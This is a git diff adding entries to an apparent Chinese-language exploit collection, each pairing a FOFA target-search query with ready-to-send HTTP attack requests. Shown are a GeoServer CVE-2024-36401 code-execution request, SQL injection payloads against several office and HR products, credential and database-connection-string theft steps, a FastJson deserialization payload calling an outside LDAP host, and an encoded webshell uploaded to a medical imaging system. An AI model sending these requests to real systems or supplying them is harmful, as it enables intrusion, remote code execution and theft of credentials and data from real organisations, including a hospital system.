diff --git a/GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401).md b/GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401).md new file mode 100644 index 0000000..a0c56e1 --- /dev/null +++ b/GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401).md @@ -0,0 +1,52 @@ +## GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) + +GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 + +在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。 + +## fofa + +``` +app="GeoServer" +``` + +## poc + +```yaml +GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 +Host: your-ip:8080 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +``` + +```yaml +POST /geoserver/wfs HTTP/1.1 +Host: your-ip:8080 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Type: application/xml +Content-Length: 356 + + + + exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2') + +``` + +![1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407030846166.png) + +## 漏洞来源 + +- https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md \ No newline at end of file diff --git a/README.md b/README.md index 7ab87cd..d30fa43 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,20 @@ # 漏洞收集 收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了700多个poc/exp,善用CTRL+F搜索 +## 2024.07.03 新增漏洞 + +- 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞 +- 科荣AIO-moffice接口存在SQL注入漏洞 +- 朗新天霁人力资源管理系统GetMessage存在sql注入漏洞 +- 用友u9系统接口GetConnectionString存在信息泄露漏洞 +- YzmCMS接口存在pay_callback远程命令执行 +- 美特CRM系统接口anotherValue存在FastJson反序列化RCE +- 飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞 +- 飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞 +- 大华ICC智能物联综合管理平台heapdump敏感信息泄露 +- 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞 +- GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) + ## 2024.06.28 新增漏洞 - WordPress插件Dokan-Pro存在SQL注入漏洞 diff --git a/YzmCMS接口存在pay_callback远程命令执行.md b/YzmCMS接口存在pay_callback远程命令执行.md new file mode 100644 index 0000000..85b01e5 --- /dev/null +++ b/YzmCMS接口存在pay_callback远程命令执行.md @@ -0,0 +1,58 @@ +# YzmCMS接口存在pay_callback远程命令执行 + +YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。 + +## fofa + +``` +app="yzmcms" +``` + +## poc + +``` +POST /pay/index/pay_callback.html HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 +Accept-Encoding: gzip +Content-Type: application/x-www-form-urlencoded + +out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022240034.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022240702.png) + + + +## afrog + +```yaml +id: YzmCMS-pay_callback-RCE + +info: + name: YzmCMS pay_callback 远程命令执行漏洞 + author: Superhero + severity: high + description: |- + fofa: app="yzmcms" + YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。 + reference: + - https://blog.csdn.net/m0_60571842/article/details/140112191 + tags: RCE + + +rules: + r0: + request: + method: POST + path: /pay/index/pay_callback.html + headers: + Content-Type: application/x-www-form-urlencoded + body: out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo + expression: response.status == 200 && response.body.bcontains(b'phpinfo()') && response.body.bcontains(b'PHP Version') + +expression: r0() + +``` \ No newline at end of file diff --git a/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md b/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md new file mode 100644 index 0000000..078d702 --- /dev/null +++ b/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md @@ -0,0 +1,20 @@ +# 大华ICC智能物联综合管理平台heapdump敏感信息泄露 + +大华ICC智能物联综合管理平台heapdump文件敏感信息泄露,可以获取账号和密码。 + +## fofa + +``` +body="static/fontshd/font-hd.css" || body="客户端会小于800" +``` + +## poc + +``` +/evo-apigw/dsc-mac/heapdump;.js +/evo-apigw/dsc-mac/env;.js +``` + + + +![image-20240702231803309](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022318391.png) \ No newline at end of file diff --git a/朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md b/朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md new file mode 100644 index 0000000..6da90c5 --- /dev/null +++ b/朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md @@ -0,0 +1,30 @@ +## 朗新天霁人力资源管理系统GetMessage存在sql注入漏洞 + +朗新天霁人力资源管理系统GetFunc_code.asmx接口参数 GetMessage 存在SQL注入漏洞,导致数据泄露。 + +## fofa + +``` +body="人力资源管理系统" && body="Silverlight" +``` + +## poc + +``` +POST /ws/GetFunc_code.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetMessage" + + + + + + 1' UNION ALL SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))-- Bthm + + + +``` + +![image-20240702222843669](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022228746.png) diff --git a/用友u9系统接口GetConnectionString存在信息泄露漏洞.md b/用友u9系统接口GetConnectionString存在信息泄露漏洞.md new file mode 100644 index 0000000..1603404 --- /dev/null +++ b/用友u9系统接口GetConnectionString存在信息泄露漏洞.md @@ -0,0 +1,98 @@ +## 用友u9系统接口GetConnectionString存在信息泄露漏洞 + +用友u9 GetConnectionString存在信息泄露漏洞,攻击者可通过该漏洞获取数据库连接信息包括数据库账号密码等敏感信息。 + +## fofa + +``` +body="logo-u9.png" +``` + +## poc + +1. 获取code + +``` +POST /CS/Office/TransWebService.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g +Upgrade-Insecure-Requests: 1 +Priority: u=1 +SOAPAction: http://tempuri.org/GetEnterprise +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 193 + + + + + + + +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022234900.png) + +2. 使用上一步获取的code获取token + +``` +POST /CS/Office/TransWebService.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g +Upgrade-Insecure-Requests: 1 +Priority: u=1 +SOAPAction: http://tempuri.org/GetToken +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 274 + + + + + + + 800 + + + +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022234913.png) + +3. 使用token获取数据库连接信息 + +``` +POST /CS/Office/TransWebService.asmx HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Cookie: .ASPXANONYMOUS=1trTf5ff2gEkAAAAMzU0N2I3ZjctYzg0OC00YWFmLTliZTEtNDI2NDc1YmYyMTc10; ASP.NET_SessionId=ntvjalpizrae22kebxy5tn0g +Upgrade-Insecure-Requests: 1 +Priority: u=1 +SOAPAction: http://tempuri.org/GetConnectionString +Content-Type: text/xml;charset=UTF-8 +Host: +Content-Length: 325 + + + + + + + Kp6iL9otgGlgsewf7WNyyT+BCVbWriP4 + + + +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022234944.png) \ No newline at end of file diff --git a/科荣AIO-moffice接口存在SQL注入漏洞.md b/科荣AIO-moffice接口存在SQL注入漏洞.md new file mode 100644 index 0000000..9f45886 --- /dev/null +++ b/科荣AIO-moffice接口存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +## 科荣AIO-moffice接口存在SQL注入漏洞 + +科荣AIO moffice 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +``` +body="changeAccount('8000')" +``` + +## poc + +``` +GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:5'--&sid=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +``` + diff --git a/美特CRM系统接口anotherValue存在FastJson反序列化RCE.md b/美特CRM系统接口anotherValue存在FastJson反序列化RCE.md new file mode 100644 index 0000000..433503a --- /dev/null +++ b/美特CRM系统接口anotherValue存在FastJson反序列化RCE.md @@ -0,0 +1,30 @@ +# 美特CRM系统接口anotherValue存在FastJson反序列化RCE + +美特CRM anotherValue接口处使用存在漏洞 fastjson 组件,未经身份验证的远程攻击者可通过fastjson 序列化漏洞对美特CRM发起攻击,执行任意代码并可获取服务器权限。 + +## fofa + +``` +body="/common/scripts/basic.js" +``` + +## poc + +``` +POST /eai/someValue/anotherValue HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Content-Length: 373 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: no-cache +Connection: close +Content-Type: application/json +Cookie: JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7 +Pragma: no-cache +Upgrade-Insecure-Requests: 1 + +{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://fpwnnkhmfn.dgrh3.cn","autoCommit":true}} +``` + diff --git a/英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md b/英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md new file mode 100644 index 0000000..851c8a2 --- /dev/null +++ b/英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md @@ -0,0 +1,43 @@ +## 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞 + +英飞达医学影像存档与通信系统Upload.asmx 接口任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +``` +"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928") +``` + +## poc + +```yaml +POST /webservices/Upload.asmx HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/UploadData" +Connection: close + + + + + +1 +1 +1 +rce.asmx +1000 +PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICB9Cn0= + + + +``` + +![image-20240702232121891](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022321942.png) + +文件路径 + +`/spool/1/rce.asmx/Cmdshell?Pass=Response.Write("Hello,World")` + +![image-20240702232224855](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022322892.png) \ No newline at end of file diff --git a/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md b/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md new file mode 100644 index 0000000..b6bfe76 --- /dev/null +++ b/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md @@ -0,0 +1,24 @@ +## 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞 + +金和OA C6 UploadFileDownLoadnew.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +``` +body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" +``` + +## poc + +``` +GET /c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240702215558016](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022155071.png) \ No newline at end of file diff --git a/飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md b/飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md new file mode 100644 index 0000000..b5521f9 --- /dev/null +++ b/飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞 + +飞企互联-FE企业运营管理平台接口/common/ajax_codewidget39.jsp 存在SQL注入漏洞,可获取数据库数据。 + +## fofa + +``` +app="飞企互联-FE企业运营管理平台" +``` + +## poc + +``` +GET /common/ajax_codewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:4%27--+ HTTP/1.1 +Host: IP +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240702225131966](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407022251014.png) \ No newline at end of file diff --git a/飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md b/飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md new file mode 100644 index 0000000..ac07e1d --- /dev/null +++ b/飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞 + +飞企互联-FE企业运营管理平台接口/docexchangeManage/checkGroupCode.js 存在SQL注入漏洞,可获取数据库数据。 + +## fofa + +``` +app="飞企互联-FE企业运营管理平台" +``` + +## poc + +``` +GET /docexchangeManage/checkGroupCode.js%70?code=1%27;waitfor+delay+%270:0:4%27--+ HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` +